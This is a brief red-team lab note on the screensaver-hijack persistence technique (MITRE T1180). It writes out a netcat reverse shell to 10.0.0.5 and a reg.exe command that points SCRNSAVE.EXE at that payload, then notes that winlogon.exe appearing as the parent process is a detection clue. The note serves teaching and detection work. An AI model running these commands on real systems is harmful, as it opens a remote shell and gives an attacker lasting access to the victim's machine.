Skip to content

T1180: Screensaver Hijack

Execution

To achieve persistence, the attacker can modify SCRNSAVE.EXE value in the registry HKCU\Control Panel\Desktop\ and change its data to point to any malicious file.

In this test, I will use a netcat reverse shell as my malicious payload:

{% code-tabs %} {% code-tabs-item title="c:\shell.cmd@victim" %}

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
{% endcode-tabs-item %} {% endcode-tabs %}

Let's update the registry:

The same could be achieved using a native Windows binary reg.exe:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d c:\shell.cmd
{% endcode-tabs-item %} {% endcode-tabs %}

Observations

Note the process ancestry on the victim system - the reverse shell process traces back to winlogon.exe as the parent process, which is responsible for managing user logons/logoffs. This is highly suspect and should warrant a further investigation:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1180" %}